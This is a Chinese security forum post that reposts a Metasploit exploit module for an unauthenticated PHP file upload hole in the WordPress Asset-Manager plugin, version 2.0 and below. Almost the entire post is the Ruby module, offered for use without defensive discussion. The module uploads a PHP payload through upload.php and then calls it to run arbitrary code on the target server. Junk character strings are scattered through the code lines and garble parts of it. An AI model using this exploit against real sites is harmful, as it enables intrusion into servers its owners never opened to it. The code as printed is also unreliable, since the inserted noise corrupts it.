找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2112|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
+ O2 q! c; S; X$ U0 f
: ^! S0 n# _: P' ?##
% @0 b7 D3 J: [) Z) F/ |' F- k5 n# This file is part of the Metasploit Framework and may be subject to* J; ~7 k9 K1 B; ]" w
# redistribution and commercial restrictions. Please see the Metasploit
- y3 j+ y' i8 L: A0 I) S# Framework web site for more information on licensing and terms of use.1 S6 g2 @! N2 F, h1 J# y, a
#   http://metasploit.com/framework/! z8 ~) E5 y5 g" y0 O5 f
##4 t7 p3 \, d2 I* F
$ F$ G9 b$ u& n3 p/ X; {% K
require 'msf/core'# O) `) s' Z& h- p$ P; X- W' _
require 'msf/core/exploit/php_exe'
* L9 _. M' `, F- Z
& r( I) x% p6 b4 W& G- ~3 |' Fclass Metasploit3 < Msf::Exploit::Remote
' G5 d4 Y7 G* q' Y# G: H3 g  Rank = ExcellentRanking
" G/ E* w; ?9 b5 [+ A : U/ K8 l7 z% K2 p5 c; m3 ~7 B& U
  include Msf::Exploit::Remote::HttpClient$ w9 g, G, q, ^$ a
  include Msf::Exploit:hpEXE
5 L7 `7 D7 j. \5 z% T# j ' R- M4 X+ k2 L3 ^! {0 x
  def initialize(info = {})
0 D3 i9 J2 ]: w    super(update_info(info,, Q3 y* g% g( c, O- [
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',4 L" r# `3 A4 K" F7 @7 o) t! s
      'Description'    => %q{
1 S0 |' f0 n6 M9 n* P        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
$ L4 O, T. Z1 M3 R  H1 t$ p9 w5 I        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
6 m0 k6 O/ Q! [2 U( U4 u        temp directory without authentication, which results in arbitrary code execution.9 T" ?/ L; i" B1 r% e
      },
3 {/ B5 M# z2 y$ E      'Author'         =>+ F! w7 a* J. O" A& f
        [5 ]% G7 Z; [& W! C. M
          'Sammy FORGIT', # initial discovery$ q1 l# ]/ O/ l) L6 d$ @
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module$ D9 w& S, s5 ~. {
        ],2 E/ |$ g0 Z: A: Y( H+ a
      'License'        => MSF_LICENSE,% w3 ^& H% e  w% ^
      'References'     =>- V8 Q' |5 w5 f( f4 s3 H* e
        [
8 A. g, x7 e$ I. A- |8 ^3 w" L          [ 'OSVDB', '82653' ],4 j: a3 C3 c, n, C& Y( O5 M3 s
          [ 'BID', '53809' ],; V$ t: W2 i% S; K
          [ 'EDB', '18993' ],
2 |* B# ?7 V+ B  w          [ 'URL', 'http:// www.myhack58.com /' ]: r4 y3 a3 J* V8 L" R9 F5 d
        ],2 H* _6 e" u# j7 ^& u, }& |
      'Payload'       =>5 k' b9 w' R' n( n1 F4 Y9 A- E
        {
7 p' W* y5 G' z# e          'BadChars' => "\x00",% L0 ?; q: N2 [/ c' B  H5 r
        },
1 |1 A1 }4 H* F5 y2 @      'Platform'       => 'php',# x& ^  \+ m* ?0 L
      'Arch'           => ARCH_PHP,
* X9 A* @  I6 J- e8 E" e      'Targets'        =>
6 B3 w7 _" K) d7 T        [, T# g( m3 P0 c7 U
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],8 f! x  S* T  C  B3 J+ ]: B! E
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
: ~: t- s  |* M  }/ {; J$ f6 l        ],
* n4 l' h, `3 E, h% J      'DefaultTarget' => 0,
7 R! h5 u6 `; O5 P) q$ R' l+ Z: w9 U      'DisclosureDate' => 'May 26 2012'))
  ~- f/ ?) u" {5 Y
9 ~9 H+ h3 e" ?: s- j    register_options(
+ ^/ S& \8 j# Z1 @      [
5 m1 z3 V: n" D* s5 v) j4 D( I        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
2 v2 _1 t: W: K: C! F      ], self.class)1 X5 w& z& H# s5 }; V7 a
  end. j; m+ K8 Z5 A* U( y, [) ], ?2 s
" }+ P( `  D0 ^' Y0 }; g6 z
  def exploit% d& {8 {" U- c( I0 F- e+ {
    uri =  target_uri.path
! ~& b; M; [. {    uri << '/' if uri[-1,1] != '/'
5 k6 R1 h, ]) H) h* u+ @- s    peer = "#{rhost}:#{rport}"5 R/ K0 M, Z7 o
    payload_name = "#{rand_text_alpha(5)}.php"- y5 t4 u" ?2 [& _
    php_payload = get_write_exec_payload(:unlink_self=>true)7 z3 Q9 R9 K3 `2 Y
/ E* F% T: w; u/ C: B- H
    data = Rex::MIME::Message.new
, `2 b( T5 @7 g    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")/ k" ?5 e9 {; a' _9 C2 H5 t
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')' {! Q7 E4 O" a' Z
' p, K. ?$ A  ]  B  o. ~8 N5 V" x
    print_status("#{peer} - Uploading payload #{payload_name}")
- x4 m) Z' a. y6 Z: x2 X, I    res = send_request_cgi({
8 {7 F! G/ e& r+ {* e' g      'method'  => 'POST',+ A4 G$ K" M6 n2 G' g. e1 H
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
% e# G9 K, r# f; F6 i& t      'ctype'   => "multipart/form-data; boundary=#{data.bound}",$ \* L) M# V' c7 {4 X
      'data'    => post_data
3 e4 V: f: w# b" i    })- Q: {3 w1 `7 G0 \, ?4 r( b

& X! m$ ]5 Y# U    if not res or res.code != 200 or res.body !~ /#{payload_name}/
! C2 E8 X' ]: K      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
2 @: L3 C' z3 Q* |: S+ b/ A7 ^$ p' Q' }end! B1 K! h1 Y% d! j& `2 p

; @& ?  {' C, w: z$ U    print_status("#{peer} - Executing payload #{payload_name}")
* L8 w7 @/ o9 t5 O1 F    res = send_request_raw({  S% p% P; ~" N* M8 a# y8 T' M
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",1 B" n% E1 x* z9 ~- `. |* f' E
      'method'  => 'GET'
5 F5 I6 g0 t6 A  V0 ?7 H    })
* w  Z$ y  S3 l+ h5 I8 ` - `/ x1 ^# U' i. K# O
    if res and res.code != 2009 _7 |. m) W* d8 H: ]5 G' X
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
, K$ [  O0 O5 L9 q+ q+ `9 }; q  p    end) Y* z2 g6 A, i3 z7 k& ?% e
  end
9 O- S2 D9 m3 _* `- h- }6 |4 l, Vend; c# c0 Y) v2 U2 X3 j! x% j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表